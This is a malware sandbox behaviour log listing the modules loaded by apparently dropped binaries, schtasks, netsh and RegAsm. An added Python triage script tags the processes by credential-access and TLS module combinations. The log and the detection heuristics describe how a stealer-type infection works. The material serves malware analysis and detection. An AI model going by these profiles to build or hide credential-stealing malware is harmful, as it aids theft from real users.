Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wsock32.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: version.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: winmm.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: mpr.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wininet.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: userenv.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: uxtheme.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wldp.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: propsys.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: profapi.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: edputil.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: netutils.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: wintypes.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: appresolver.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: slc.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: sppc.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: pcacli.dll
Source: C:\Users\user\1000021002\ac861238af.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: fwpuclnt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mskeyprotect.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncryptsslp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: msasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: gpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: vaultcli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wintypes.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wldp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winmm.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: rstrtmgr.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ncrypt.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ntasn1.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d11.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxgi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: resourcepolicyclient.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: d3d10warp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dxcore.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: sspicli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winhttp.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: wininet.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: mswsock.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: devobj.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: webio.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: winnsi.dll
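The "Section loaded" records above give each process a loaded-module profile, and the profile is often more telling than any single load: a binary running from a user-writable path that pulls in both the credential-access modules (vaultcli.dll, dpapi.dll) and the TLS stack (schannel.dll, winhttp.dll) looks like a stealer; a .NET registration utility such as RegAsm.exe loading a TLS stack it has no reason to use is consistent with injected code; netsh.exe loading the WLAN helper modules (wlanapi.dll, wlancfg.dll) is consistent with a netsh wlan command. The script below is an added example, not part of this report and not a sandbox rule: it parses such lines and tags each process by these combinations. The sample lines are copied from this report; the indicator sets, the list of .NET utilities and the tag names are this example's own heuristics.

```python
"""Tag processes by their loaded-module profile from sandbox "Section loaded" lines.

Added example, not part of the report. The report lines below are copied
from this analysis; the indicator sets are this example's own heuristics.
"""
import re
from collections import defaultdict

# Lines copied from this report (a subset; link text such as "Jump to behavior" dropped).
REPORT_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dpapi.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: schannel.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: vaultcli.dll
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
"""

LINE_RE = re.compile(r"^Source: (?P<image>.+?) Section loaded: (?P<dll>\S+)")

# Heuristic indicator sets (assumptions of this example, not sandbox rules).
CREDENTIAL_ACCESS = {"vaultcli.dll", "dpapi.dll"}          # Credential Manager + DPAPI
TLS_NETWORK = {"schannel.dll", "winhttp.dll", "wininet.dll"}
WLAN_HELPERS = {"wlanapi.dll", "wlancfg.dll"}              # netsh wlan context
DOTNET_UTILITIES = {"regasm.exe", "regsvcs.exe", "installutil.exe"}  # assumed: no network use expected
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\")


def parse_loads(text):
    """Map each process image path to the set of modules it loaded."""
    loads = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            loads[m.group("image")].add(m.group("dll").lower())
    return dict(loads)


def assess(loads):
    """Return {image: [tags]} for every image that earned at least one tag."""
    findings = {}
    for image, dlls in loads.items():
        tags = []
        name = image.rsplit("\\", 1)[-1].lower()
        in_user_path = image.lower().startswith(USER_WRITABLE_PREFIXES)
        if in_user_path:
            tags.append("user-writable-path")
        if dlls & CREDENTIAL_ACCESS:
            tags.append("credential-access")
        if dlls & TLS_NETWORK:
            tags.append("tls-network")
        if name in DOTNET_UTILITIES and dlls & TLS_NETWORK:
            # A registration tool opening TLS sessions points at injected code.
            tags.append("dotnet-utility-with-network")
        if name == "netsh.exe" and dlls & WLAN_HELPERS:
            tags.append("netsh-wlan")
        if in_user_path and dlls & CREDENTIAL_ACCESS and dlls & TLS_NETWORK:
            # Dropped binary that can both decrypt local secrets and talk TLS out.
            tags.append("stealer-profile")
        if tags:
            findings[image] = tags
    return findings


if __name__ == "__main__":
    for image, tags in assess(parse_loads(REPORT_LINES)).items():
        print(f"{image}\n    {', '.join(tags)}")
```

Run against the full report the script tags the dropped binaries in Temp and ProgramData as stealer-profile, tags RegAsm.exe for networking it should not do, and leaves schtasks.exe untagged; the thresholds are deliberately loose, so treat the tags as triage hints to read alongside the process tree, not as verdicts.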
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
